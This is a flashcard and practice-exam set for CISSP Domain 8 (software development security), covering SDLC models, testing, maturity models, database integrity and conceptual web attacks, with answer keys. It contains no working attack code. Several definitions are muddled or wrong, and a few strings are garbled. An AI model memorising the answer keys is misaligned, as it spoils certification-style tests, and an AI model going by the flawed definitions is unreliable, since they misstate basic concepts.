CISSP - Domain 8. Software Development Security

Pataasin ang iyong marka sa homework at exams ngayon gamit ang Quizwiz!

1. Black box testing - Best form of testing 2. White box testing 3. Dynamic Testing 4. Static Testing 5. Manual Testing 6. Automated Testing

1. No internal code details are used - Evaluation of input and output. Tester doesn't have access to the code and its implementation. 2. Internal code details are shared/considered. Tester has full access to the internal code. 3. System/software is executed and its behavior is observed. 4. Examining source code without executing the system/software 5. Test guided by human 6. Test is performed by an application.

1. Development Phase 2. Testing of completed Product and also in Operations phase. 3. Planning and Design Phase 4. Operations Phase.

1. Static Source Code Review and Manual Code Review are performed in which phase of SDLC? 2. Penetration Testing, Vulnerability scanning and Fuzz testing are performed in which phase of SDLC? 3. Threat Modeling is performed in which phase of SDLC? 4. Passive Testing (Monitoring, IDS) should be performed in which phase?

10. D. iv. The following are correct characteristics of the ACID test: • Atomicity Divides transactions into units of work and ensures that all modifications take effect or none take effect. Either the changes are committed or the database is rolled back. • Consistency A transaction must follow the integrity policy developed for that particular database and ensure all data is consistent in the different databases. • Isolation Transactions execute in isolation until completed, without interacting with other transactions. The results of the modification are not available until the transaction is completed. • Durability Once the transaction is verified as accurate on all systems, it is committed and the databases cannot be rolled back.

10. Databases can record transactions in real time, which usually updates more than one database in a distributed environment. This type of complexity can introduce many integrity threats, so the database software should implement the characteristics of what's known as the ACID test. Which of the following are incorrect characteristics of the ACID test? i. Atomicity Divides transactions into units of work and ensures that all modifications take effect or none takes effect. ii. Consistency A transaction must follow the integrity policy developed for that particular database and ensure all data is consistent in the different databases. iii. Isolation Transactions execute in isolation until completed, without interacting with other transactions .iv. Durability Once the transaction is verified as inaccurate on all systems, it is committed and the databases cannot be rolled back.

11. B. The following outlines the common phases of the software development life cycle: i. Requirements gathering ii. Design iii. Development iv. Testing v. Operations and maintenance

11. The software development life cycle has several phases. Which of the following lists these phases in the correct order? A. Requirements gathering, design, development, maintenance, testing, release B. Requirements gathering, design, development, testing, operations and maintenance C. Prototyping, build and fix, increment, test, maintenance D. Prototyping, testing, requirements gathering, integration, testing

12. D. i, ii, iii, iv. There are different types of tests the software should go through because there are different potential flaws we will be looking for. The following are some of the most common testing approaches: • Unit testing Testing individual components in a controlled environment where programmers validate data structure, logic, and boundary conditions • Integration testing Verifying that components work together as outlined in design specifications • Acceptance testing Ensuring that the code meets customer requirements • Regression testing After a change to a system takes place, retesting to ensure functionality, performance, and protection

12. John is a manager of the application development department within his company. He needs to make sure his team is carrying out all of the correct testing types and at the right times of the development stages. Which of the following accurately describe types of software testing that should be carried out? i. Unit testing Testing individual components in a controlled environment where programmers validate data structure, logic, and boundary conditions. ii. Integration testing Verifying that components work together as outlined in design specifications. iii. Acceptance testing Ensuring that the code meets customer requirements. iv. Regression testing After a change to a system takes place, retesting to ensure functionality, performance, and protection.

13. B. Garbage collection is an automated way for software to carry out part of its memory management tasks. A garbage collector identifies blocks of memory that were once allocated but are no longer in use and deallocates the blocks and marks them as free. It also gathers scattered blocks of free memory and combines them into larger blocks. It helps provide a more stable environment and does not waste precious memory. Some programming languages, such as Java, perform automatic garbage collection; others, such as C, require the developer to perform it manually, thus leaving opportunity for error.

13. Tim is a software developer for a financial institution. He develops middleware software code that carries out his company's business logic functions. One of the applications he works with is written in the C programming language and seems to be taking up too much memory as it runs over time. Which of the following best describes what Tim should implement to rid this software of this type of problem? A. Bounds checking B. Garbage collector C. Parameter checking D. Compiling

14. A. The listed software development methodologies and their definitions are as follows: • Joint Analysis Development (JAD) A methodology that uses a team approach in application development in a workshop-oriented environment. • Rapid Application Development (RAD) A methodology that combines the use of prototyping and iterative development procedures with the goal of accelerating the software development process. • Reuse methodology A methodology that approaches software development by using progressively developed code. Reusable programs are evolved by gradually modifying pre-existing prototypes to customer specifications. Since the reuse methodology does not require programs to be built from scratch, it drastically reduces both development cost and time. • Cleanroom An approach that attempts to prevent errors or mistakes by following structured and formal methods of developing and testing. This approach is used for high-quality and critical applications that will be put through a strict certification process.

14. Marge has to choose a software development methodology that her team should follow. The application that her team is responsible for developing is a critical application that can have few to no errors. Which of the following best describes the type of methodology her team should follow? A. Cleanroom B. Joint Analysis Development (JAD) C. Rapid Application Development (RAD) D. Reuse methodology

15. C. Fuzz testing, or fuzzing, is a software-testing technique that provides invalid, unexpected, or random data to the input interfaces of a program. If the program fails (for example, by crashing or failing built-in code assertions), the defects can be noted.

15. __________ is a software-testing technique that provides invalid, unexpected, or random data to the input interfaces of a program. A. Agile testing B. Structured testing C. Fuzzing D. EICAR

16. A. The five levels of the Capability Maturity Integration Model are • Initial Development process is ad hoc or even chaotic. The company does not use effective management procedures and plans. There is no assurance of consistency, and quality is unpredictable. Success is usually the result of individual heroics. • Repeatable A formal management structure, change control, and quality assurance are in place. The company can properly repeat processes throughout each project. The company does not have formal process models defined. • Defined Formal procedures are in place that outline and define processes carried out in each project. The organization has a way to allow for quantitative process improvement. • Managed The company has formal processes in place to collect and analyze quantitative data, and metrics are defined and fed into the process-improvement program. • Optimizing The company has budgeted and integrated plans for continuous process improvement.

16. Which of the following is the second level of the Capability Maturity Model Integration? A. Repeatable B. Defined C. Managed D. Optimizing

17. B. The characteristics and their associated definitions are listed as follows: • Modularity Autonomous objects, cooperation through exchanges of messages. • Deferred commitment The internal components of an object can be redefined without changing other parts of the system. • Reusability Refining classes through inheritance. Other programs using the same objects. • Naturalness Object-oriented analysis, design, and modeling map to business needs and solutions.

17. One of the characteristics of object-oriented programming is deferred commitment. Which of the following is the best description for this characteristic? A. The building blocks of software are autonomous objects, cooperating through the exchange of messages. B. The internal components of an object can be redefined without changing other parts of the system. C. Classes are reused by other programs, though they may be refined through inheritance. D. Object-oriented analysis, design, and modeling map to business needs and solutions.

18. D. The buffer overflow is probably the most notorious of input validation mistakes. A buffer is an area reserved by an application to store something in it, such as some user input. After the application receives the input, an instruction pointer points the application to do something with the input that's been put in the buffer. A buffer overflow occurs when an application erroneously allows an invalid amount of input to be written into the buffer area, overwriting the instruction pointer in the code that tells the program what to do with the input. Once the instruction pointer is overwritten, whatever code has been placed in the buffer can then be executed, all under the security context of the application.

18. Which of the following attack types best describes what commonly takes place when you insert specially crafted and excessively long data into an input field? A. Traversal attack B. Unicode encoding attack C. URL encoding attack D. Buffer overflow attack

19. A. The nonpersistent cross-site scripting vulnerability is when the data provided by a web client, most commonly in HTTP query parameters or in HTML form submissions, is used immediately by server-side scripts to generate a page of results for that user without properly sanitizing the response. The persistent XSS vulnerability occurs when the data provided by the attacker is saved by the server and then permanently displayed on "normal" pages returned to other users in the course of regular browsing without proper HTML escaping. DOM-based vulnerabilities occur in the content processing stages performed by the client, typically in client-side JavaScript.

19. Which of the following has an incorrect attack-to-definition mapping? A. EBJ XSS attack Content processing stages performed by the client, typically in client-side Java. B. Nonpersistent XSS attack Improper sanitation of response from a web client. C. Persistent XSS attack Data provided by attackers is saved on the server. D. DOM-based XSS attack Content processing stages performed by the client, typically in client-side JavaScript.

2. A. DevOps is a type of integrated product team (IPT) that focuses on three communities: software development, IT operations, and quality assurance. The idea is to reduce the friction that oftentimes exists between the developers and IT staff in order to improve quality and velocity.

2. Which of the following best describes the term DevOps? A. The practice of incorporating development, IT, and quality assurance (QA) staff into software development projects. B. A multidisciplinary development team with representatives from many or all the stakeholder populations. C. The operationalization of software development activities to support just-in-time delivery. D. A software development methodology that relies more on the use of operational prototypes than on extensive upfront planning.

20. B. An object-relational database (ORD) or object-relational database management system (ORDBMS) is a relational database with a software front end that is written in an object-oriented programming language. Different companies will have different business logic that needs to be carried out on the stored data. Allowing programmers to develop this front-end software piece allows the business logic procedures to be used by requesting applications and the data within the database.

20. John is reviewing database products. He needs a product that can manipulate a standard set of data for his company's business logic needs. Which of the following should the necessary product implement? A. Relational database B. Object-relational database C. Network database D. Dynamic-static

21. A. The following are correct characteristics of ADO: • It's a high-level data access programming interface to an underlying data access technology (such as OLE DB). • It's a set of COM objects for accessing data sources, not just database access. • It allows a developer to write programs that access data without knowing how the database is implemented. • SQL commands are not required to access a database when using ADO.

21. ActiveX Data Objects (ADO) is an API that allows applications to access back-end database systems. It is a set of ODBC interfaces that exposes the functionality of data sources through accessible objects. Which of the following are incorrect characteristics of ADO? i. It's a low-level data access programming interface to an underlying data access technology (such as OLE DB). ii. It's a set of COM objects for accessing data sources, not just database access. iii. It allows a developer to write programs that access data without knowing how the database is implemented. iv. SQL commands are required to access a database when using ADO.

24. B. Software configuration management (SCM) identifies the attributes of software at various points in time, and performs a methodical control of changes for the purpose of maintaining software integrity and traceability throughout the software development life cycle. It defines the need to track changes and provides the ability to verify that the final delivered software has all of the approved changes that are supposed to be included in the release.

24. Which of the following is the best technology for Sandy's team to implement as it pertains to the previous scenario? A. Computer-aided software engineering tools B. Software configuration management C. Software development life-cycle management D. Software engineering best practices

25. D. A service-oriented architecture (SOA) provides standardized access to the most needed services to many different applications at one time. This approach allows for different business applications to access the current web services available within the environment.

25. Which is the best software architecture that Sandy should introduce her team to for effective business application use? A. Distributed component object architecture B. Simple Object Access Protocol architecture C. Enterprise JavaBeans architecture D. Service-oriented architecture

26. D. A mashup is the combination of functionality, data, and presentation capabilities of two or more sources to provide some type of new service or functionality. Open APIs and data sources are commonly aggregated and combined to provide a more useful and powerful resource.

26. Which best describes the approach Sandy's team member took when creating the business-oriented software package mentioned within the scenario? A. Software as a Service B. Cloud computing C. Web services D. Mashup

29. A. Client-side validation is being carried out. This procedure ensures that the data that is inserted into the form contains valid values before being sent to the web server for processing. The web server should not just rely upon client-side validation, but should also carry out a second set of procedures to ensure that the input values are not illegal and potentially malicious.

29. Which of the following functions is the web server software currently carrying out, and what is an associated security concern Brad should address? A. Client-side validation The web server should carry out a secondary set of input validation rules on the presented data before processing it. B. Server-side includes validation The web server should carry out a secondary set of input validation rules on the presented data before processing it. C. Data Source Name logical naming access The web server should be carrying out a second set of reference integrity rules. D. Data Source Name logical naming access The web server should carry out a secondary set of input validation rules on the presented data before processing it.

3. D. Some files cannot be properly sanitized by the antivirus software without destroying them or affecting their functionality. So, the administrator must replace such a file with a known uninfected file. Plus, the administrator needs to make sure he has the patched version of the file, or else he could be introducing other problems. Answer C is not the best answer because the administrator may not know the file was clean yesterday, so just restoring yesterday's file may put him right back in the same boat.

3. A system has been patched many times and has recently become infected with a dangerous virus. If antimalware software indicates that disinfecting a file may damage it, what is the correct action? A. Disinfect the file and contact the vendor B. Back up the data and disinfect the file C. Replace the file with the file saved the day before D. Restore an uninfected version of the patched file from backup media

30. B. The current architecture allows for web server software to directly communicate with a back-end database. Brad should ensure that proper database access authentication is taking place so that SQL injection attacks cannot be carried out. In a SQL injection attack the attacker sends over input values that the database carries out as commands and can allow authentication to be successfully bypassed.

30. Pertaining to the network architecture described in the previous scenario, which of the following attack types should Brad be concerned with? A. Parameter validation attack B. Injection attack C. Cross-site scripting D. Database connector attack

4. B. Instantiation is what happens when an object is created from a class. Polyinstantiation is when more than one object is made and the other copy is modified to have different attributes. This can be done for several reasons. The example given in the chapter was a way to use polyinstantiation for security purposes to ensure that a lower-level subject could not access an object at a higher level.

4. What is the purpose of polyinstantiation? A. To restrict lower-level subjects from accessing low-level information B. To make a copy of an object and modify the attributes of the second copy C. To create different objects that will react in different ways to the same input D. To create different objects that will take on inheritance attributes from their class

5. C. A database view is put into place to prevent certain users from viewing specific data. This is a preventive measure, because the administrator is preventing the users from seeing data not meant for them. This is one control to prevent inference attacks.

5. Database views provide what type of security control? A. Detective B. Corrective C. Preventive D. Administrative

7. A. The trick to this question, and any one like it, is that security should be implemented at the first possible phase of a project. Requirements are gathered and developed at the beginning of a project, which is project initiation. The other answers are steps that follow this phase, and security should be integrated right from the beginning instead of in the middle or at the end.

7. When should security first be addressed in a project? A. During requirements development B. During integration testing C. During design specifications D. During implementation

8. C. This can seem like a tricky question. It states that the system has detected an invalid transaction, which is most likely a user error. This error should be logged so it can be reviewed. After the review, the supervisor, or whoever makes this type of decision, will decide whether or not it was a mistake and, if so, investigate it as needed. If the system had a glitch, power fluctuation, hang-up, or any other software- or hardware-related error, it would not be an invalid transaction, and in that case the system would carry out a rollback function.

8. An online transaction processing (OLTP) system that detects an invalid transaction should do which of the following? A. Roll back and rewrite over original data B. Terminate all transactions until properly addressed C. Write a report to be reviewed D. Checkpoint each data entry

9. D. In a relational database, a row is referred to as a tuple, whereas a column is referred to as an attribute.

9. Which of the following are rows and columns within relational databases? A. Rows and tuples B. Attributes and rows C. Keys and views D. Tuples and attributes

Project, Program and Porfolio

A project is a temporary endeavor, with a finite start and end, that is focussed on creating a unique product, service or result. A program is a collection of projects. Like project, program too is temporary, when all projects complete, program is marked complete. A portfolio is collection projects and programs.

Database Denormalization

Adding extra information to the tables for performance or security. - Redundant information to enhance performance - Incorrect information the tables as inference security measure.

This software development model is iterative and incremental processes that emphasizes time box team based collaboration.

Agile Methodology (Refer 59.1. SDLC)

DevOps

An approach based on lean and agile principles in which business owners and the development, operations, and quality assurance departments collaborate. - In other words, it is software development and delivery process that emphasizes communication and collaboration between product management, software development and operation professionals in the entire service lifecycle.

- Initial. - Process is unpredictable - Managed - Process is characterized by process and is reactive - Defined - Process is characterized by the organization and is proactive - Quantitively Managed. - Process is measured and controlled - Optimized - Focus on process improvement

CMMI is later version of CMM

Database Schema

It is the skeleton structure that represents the logical view of the entire database. It defines how the data is organized and how the relations among them are associated. It formulates all the constraints that are to be applied on the data. It also defines Blue Print of Database structure.

Message - How objects communicate to operate Method - Function of action an object can carry out. Behavior - Results or output of an object upon receipt of a message (How it behaves) Classes - Code container of common methods that defines attributes and behavior of possible objects within them. Objects - There are created, destroyed and manipulated. Delegation - forwarding of request by an object. Instance - example of classes containing their method.

Key Terminology for OOP

ISCM Workflow (Information Security Continuity Management)

Phases are: - Define Program - Establish Program - Implement Program - Report/Analyze Program - Monitor Program - Repeat it

Configuration Management Workflow

Phases are: - Research and Plan Baseline based on NIST publications - Approve the Plan - Implement & Deploy - Control Changes - Monitor - Report

Change Management Workflow

Phases are: - Submit Request - Evaluate Request - Test Request (Optional) - Approve Request - Document/Log Request - Implement Request - Verify Implementation - Close Request

Integration Testing

QA Test team verifies that the components work together as outlined in design specification. If not back to developer for unit testing.

Unit Testing

Testing of individual Modules - Individual components is in a controlled environment where programmers validate data structure, logic and boundary conditions. This test is generally carried out by development team.

SSE-CMM - Initial :Ad hoc/Terrible - Repeatable : Still it is Reactive, Change Control in place but Formal Process is not defined. - Well Defined: Proactive and defined processes in place. - Managed: Qualitative data is collected and analyzed. Process improvement program is used. - Optimized - Continuous Process improvement process in place and budgetted.

The only CMM developed specifically to address security in addition to maturity.

Interface Testing

This is the evaluation of how systems or components exchange data and control

Acceptance Testing.

This test is carried out by team to ensure if the code meet the written requirements.

Tracks files, source code and configurations overtime.

Version Control (Refer 59.1. SDLC)

Software Development Methodologies Warterfall

Waterfall - Very Linear and each phase leads directly into the next and doesn't allow to go back. There's a lack of flexibility with this approach, Sashimi model is like Waterfall but you can traverse back & forth between the phases.

It is a linear software development model that requires that each phase must be completed before moving on to the next phase.

Waterfall Model (Refer 59.1. SDLC)

Different software development models

Waterfall Model V-Model Seshame Model (Like Waterfall but traverse both ways) Spiral Model Clearoom Model Agile RAD (Refer 59.1. SDLC)

1. Better Schedule Management 2. Better quality management and maintenance 3. Reduction of the general defect rate in software.

What are the three important business goals of software development CMM?

Indexing

What is used to find the records within a table more quickly.

Attack Surface Identification

What part of the security review process are the input parameters listed below used for? - Configuration Input Parameters - User Input Parameters - Control Input Parameters - Backend Input Parameters.

Waterfall Methodology Phases are: 1. Requirement Definition 2. System and Software Design 3. Implementation & Unit Testing (Logical Design) 4. Integration and System Testing 5. Document, Implement & Operational Maintenance 6. End of Life Retirement.

This software development method is pervasive and based on Measure Twice and cut once. It is most suited for Big, Long Term Projects.

Polyinstantiation

To protect sensitive data such as top secret, users lower-level users received fake view of the data. In other words, false data in inserted and shown to users without "need to know" who are attempting to access records. In other words, it display different results to different individuals who pose identical queries on identical databases, due to those individuals possessing different security levels.

Top Down vs Bottom Up Programming concept

Top Down- Starts with a big picture and breaks it down to smaller segments. Bottom Up - Piecing together of systems to build more complex systems. The base elements of the system are first specified in great details and linked together to form a larger picture. OOP leans towards Bottom Up Programming. Note - These are not SDLC methodology.

1. B. A Trojan horse looks like an innocent and helpful program, but in the background it is carrying out some type of malicious activity unknown to the user. The Trojan horse could be corrupting files, sending the user's password to an attacker, or attacking another computer.

1. An application is downloaded from the Internet to perform disk cleanup and to delete unnecessary temporary files. The application is also recording network login data and sending it to another party. This application is best described as which of the following? A. A virus B. A Trojan horse C. A worm D. A logic bomb

CSRF (Cross Site Request Forgery) This can be prevented using cryptographic token to prevent a forgery.

- It takes the advantage of the trust that a web application has in the user browser. - Using the cookie and the token of existing trusted browser to access a secure website and steal the information. - This is also called One Click attack or session riding.

Programming Languages Generations

1st Generation - Machine Code 2nd Generation - Assembers 3rd Generation - Cobol, C, C++, Java, Java Scripts etc 4th Generation (4GL)- Coldfusion, Progress 4GL, SQL, PHP, Perl

6. A. Partitioning means to logically split the database into parts. Views then dictate which users can view specific parts. Cell suppression means that specific cells are not viewable by certain users. And noise and perturbation is when bogus information is inserted into the database to try to give potential attackers incorrect information.

6. Which of the following techniques or set of techniques is used to deter database inference attacks? A. Partitioning, cell suppression, and noise and perturbation B. Controlling access to the data dictionary C. Partitioning, cell suppression, and small query sets D. Partitioning, noise and perturbation, and small query sets

Interpreter; Bytecode

An interpreter is a computer program that directly executes instructions written in a programming or scripting language, without requiring them previously to have been compiled into a machine language program. A Bytecode is program code that has been compiled from source code into low-level code designed for a software interpreter.

Database - User defined Integrity

Business integrity, also called user integrity, ensures that the database enforces user-defined business rules, regulations, policies, and procedures. You usually enforce business integrity by using stored procedures and triggers.

Term used to describe commonly used suite of development tools; like diagramming aids, library of standard function tools, version control tools and project management tools.

CASE (Computer Aided Software Engineering) (Refer 59.1. SDLC)

Phases of CMM

Capability Maturity Model - Initial (Uncontrolled/Unpredictable) - Managed (Project Oriented Management/Reactive) - Defined. (Project Oriented Basic Policies/standards/Repeatable/Proactive) - Quantitatively Managed (Processes are measured, Metrics can be applied and controlled) - Optimized (Focussed on process improvement) (Refer 59.1. SDLC)

It manages changes to artifacts, such as code changes or documentation changes.

Change Control (Refer 59.1. SDLC)

This is software development model that need strict certification and structured and formal method of development and statistical quality control with the goal of eliminating defects prior to release.

Cleanroom Approach (Refer 59.1. SDLC)

Spiral Development Model.

Combines Waterfall and Prototyping with risk assessment. - Each phase or quadrant - associated risks are defined and analyzed. - Each iteration is designed using waterfall model.

It is used to support the development baseline and standards.

Configuration Management (Refer 59.1. SDLC)

Database Shadowing

Copies data from a live database to a read only copy. The database shadow is an offline backup, which is only made available in instances when the primary database is 'incapacitated'. It is Exact real time copy of the database or files to another location. It can be another disk in the same server, but best practices dictates another geographical location, often on a different media.

Database DDL & DML

DDL statements are used to create database, schema, constraints, users, tables etc. DML statement is used to insert, update or delete the records.

EU-US Privacy Shield

Main Parts of the Privacy Shield are: - Notice - Choice - Accountability to forward transfer - Security - Data Integrity - Access Control - Resources, Enforcement & Liability

Database - Semantic Integrity

Each attribute value is consistent with the attribute data type.

Database - Entity Integrity

Each row in secondary table should have unique foreign key or unique primary value. If the primary key gets duplicated, the entity integrity is lost. Entity integrity requires that each entity have a unique key. For example, if every row in a table represents relationships for a unique entity, the table should have one column or a set of columns that provides a unique identifier for the rows of the table. ... Defining the parent key is called entity integrity.

eVaulting

Electronic vaulting (e-vaulting): Using a remote backup service, backups are sent off-site electronically at a certain interval or when files change.

Database Normalization

Eliminate Duplicates. The process of organizing the fields and tables of a relational database to minimize redundancy and dependency.

Cleanroom Model

Focussed on defect prevention rather than removal. - Get your software correct the first time. - Don't release buggy program and then patch/patch and patch

Freeware, Shareware , Crippleware & EULA

Freeware is free for charge. Shareware is proprietary software that is initially free to use. Often for Trials to test the software. Crippleware partially functioning software and requires to make payment to enable full functionality. EULA - End User License Agreement

NIST 80-128

Guide for Security Focussed Configuration Management (CM Plan) of Information Systems. - Comprehensive description of the roles, responsibilities, policies and procedures that apply when managing the configuration of products and systems. Basic Past of CM Plan include: - Configuration Control Board (CCB) - Configuration Item Identification - Configuration Change Control - Configuration Monitoring

Phases of SDLC

ISO/IEC 12207 standard for SDLC Phases are - 1. Feasibility Study 2. Requirement Gathering 3. Design 4. Development/Build 5. Deployment/Implemention 6. Support/Operage (Refer 59.1. SDLC)

Abstraction

Ignoring detail while analyzing

Database Dictionary

It is a central repository of database metadata. It contain information about database views, administrators, user accounts, auditing and database schema. Cross reference between the groups of data elements and how they interact with each other (relationship). Allows central management of database.

Fagan's Inspection

It is a software review process that depends of Formal Review Process and would involve both developer and a team to review the code using formal process.

XSS (Cross Site Scripting)

It is a way to hijack a web application where an attacker can inject malicious code into victim's web application to hack the sensitive data like cookies, browser storage etc. As a result, they can hack the sensitive data when they find any loophole where their query reflects as HTML in the web application instead of HTML entities.

2. Non Persistent (Reflected) XSS - This attack is not permanent one but by chance if the victim clicks the link then attacker can easily able to hack the sensitive data. In this case, user is the target of attack.

It is another way of hacking where the attacker will try to add the malicious code after "?" of the vulnerable URL. Often they add a Java script after "Search?", which gets executed the moment user logs into the vulnerable web page. These kind of attack happens when user receive pre-made URL like your UPS tracking # or Delivery pending from the web sites.

OOP

Object Oriented Programming: "A method of programming which classifies real world objects into classes, data structures and encapsulates those objects attributes and behaviors."

Benefits and Flaws of Open Source vs Closed Source

Open Source : Code is release publicly, tested and corrected but it allows attackers to find flaws with it. Closed Source : Keep the source code a secret, it may be good business practice but it can cause Security through Obscurity.

Operational Acceptance Testing

Operational acceptance testing: Does the software and all of the components it interacts with ready requirements for operation? Tested by system administrators; - are the backups in place? - Do we have a DR plan? - How do we handle patching? - Is it checked for vulnerabilities? Etc.

Hierarchical Databases

Organizes data using a tree-like or organizational chart type structure (the child can only have one parent). Windows Registry is an example of a hierarchical database.

Software Licenses

Permissive. Permissive licenses are also known as "Apache style" or "BSD style." They contain minimal requirements about how the software can be modified or redistributed. This type of software license is perhaps the most popular license used with free and open source software. Aside from the Apache License and the BSD License, another common variant is the MIT License. LGPL. The GNU Lesser General Public License allows you to link to open source libraries in your software. If you simply compile or link an LGPL-licensed library with your own code, you can release your application under any license you want, even a proprietary license. But if you modify the library or copy parts of it into your code, you'll have to release your application under similar terms as the LGPL.

Digital Forensic Process

Processes are: - Evidence Collection - Acquisition - Examination - Analyze - Report - Testify - Archive

High cohesion and Low coupling.

Programmers should strive to develop modules that have ----- cohesion and ---- coupling. Cohesion addresses the fact that a module can perform a single task with low input from other modules. Coupling is the measurement of the amount of interconnections or dependencies between modules. Low coupling means that a change to one module should not affect another and the module has high cohesion.

This approach sets the scope, boundaries, defines guidelines, performs coordination and deliverables

Project Management Project Manager provides day to day facilitations and coordination. (Refer 59.1. SDLC)

It deploys (makes available) versions to various resources for simultaneous development.

Provisioning (Refer 59.1. SDLC)

This is software development model is iterative that combines with prototyping.

RAD Methodology (Refer 59.1. SDLC)

Full and Partial Disclosures. (Question in Domain 8)

Responsible/Partial disclosure: Telling the vendor, they have time to develop a patch and then disclose it. If they do nothing we can revert to the full disclosure forcing them to act.

Risk Management Framework

Risk Management Framework Steps are: - Classify/Categorize Assets - Select Appropriate Controls - Implement Controls - Assess Controls - Authorize Information Security - Monitor Controls.

SCRUM - It is a framework for managing software development. Scrum is designed for teams of approx 10 individuals and generally relies on two weeks development cycle called sprints.

SCRUM Core Roles of Scrum Framework are: - Product Owner - Represents stakeholders and customer. - Development Team - Scrum Master - To ensure framework is followed and removes the roadblock.

Source Code Escrow

Source code escrow is used to obtain change rights over software after the vendor goes out of business. Source code escrow is the deposit of the source code of software with a third-party escrow agent. ... The software's source code is released to the licensee if the licensor files for bankruptcy or otherwise fails to maintain and update the software as promised in the software license agreement.

This software development model is iterative approach that emphasizes risk analysis and user feedback.

Spiral Model (Refer 59.1. SDLC)

Document Oriented Database

Stores unstructured data, such as the text of a speech or newspaper article. A document-oriented database, or document store, is a computer program designed for storing, retrieving and managing document-oriented information. XML databases are a subclass of document-oriented databases that are optimized to work with XML documents.

Polymorphism

Technically this means that one thing has the capability to take on many appearances. - On input but multiple outputs due to different variables or methods. - How different objects perform to same command.

Cardinality & Degree of the table.

What term is used if there are equal number of rows in the table. What term is used for the count of columns in the table.

Database - Referential Integrity

When every foreign key in secondary table matches or subset of primary table. This integrity is broken if any of the foreign key is missing in Primary table.

1. Persistent (Stored) XSS. -

This is type of XSS, which has strong affluence & will be permanently available until the victim (targeted user) try to secure the web application with the techniques like Escape Strings, HTML Encoding etc. This might happen through the commonplace like "Comments List, Posts List" of the application.

Aggregation

The process of combining several low-sensitivity items, and drawing medium- or high-sensitivity conclusions.

Inference

The process of deducing privileged information from available unprivileged sources.

CASE (Computer aided software Engineering)

This is wide variety of automated productivity tools to help programmers, PM's and analysts. - Allows rapid prototyping - Less manual coding means less errors. - Debuggers, code analyzers, version control tools

Database Views (table)

Two tables can be joined virtually using the Database Views Plugin to allow for reporting on data that might be stored in more than one table. You can provide users a view of part of the database.

28. B. The characters "%20" are encoding values that attackers commonly use in URL encoding attacks. These encoding values can be used to bypass web server filtering rules and can result in the attacker being able to gain unauthorized access to components of the web server. The characters "../" can be used by attackers in similar web server requests, which instruct the web server software to traverse directories that should be inaccessible. This is commonly referred to as a path or directory traversal attack.

Use the following scenario to answer Questions 28-30. Brad is a new security administrator within a retail company. He is discovering several issues that his security team needs to address to better secure their organization overall. When reviewing different web server logs, he finds several HTTP server requests with the characters "%20" and "../". The web server software ensures that users input the correct information within the forms that are presented to them via their web browsers. Brad identifies that the organization has a two-tier network architecture in place, which allows the web servers to directly interact with the back-end database. 28. Which of the following best describes attacks that coterm-78uld be taking place against this organization? A. Cross-site scripting and certification stealing B. URL encoding and directory traversal attacks C. Parameter validation manipulation and session management attacks D. Replay and password brute-force attacks

This software development model emphasizes on verification and validation at each phase and testing to take place throughout the project.

V-Model (Refer 59.1. SDLC)

XP (Extreme Programming)

Which development method is where the teams are responsible not only for coding but also for writing the tests used to verify the code. There is minimal focus on structured documentation and it does not scale well for large projects.

Agile - Get the program out ASAP.

Which development model provides 1. Close Collaboration 2. Frequent delivery of new deployable business value. 3. Face to face communication & Knowledge sharing 4. Storyboard ev everything to aid in clear communication.

Software Development Methodologies XP

XP - Extreme Programming XP (Extreme programming): Intended to improve software quality and responsiveness to changing customer requirements. XP uses: Programming in pairs or doing extensive code review. Avoiding programming of features until they are actually needed.

Tuple & Attribute

a row or record in a table that contains data about a specific item in a database table. It is a column or field in the database table.


Kaugnay na mga set ng pag-aaral

Lap 4 APUSH College Board test review

View Set

EAQ Morris Chapter 21, Basic Intravenous Calculations - Intermediate Level

View Set

Western Civ Midterm Review-Chapter 3

View Set

Financial Accounting 15th edition Chapter 4-5

View Set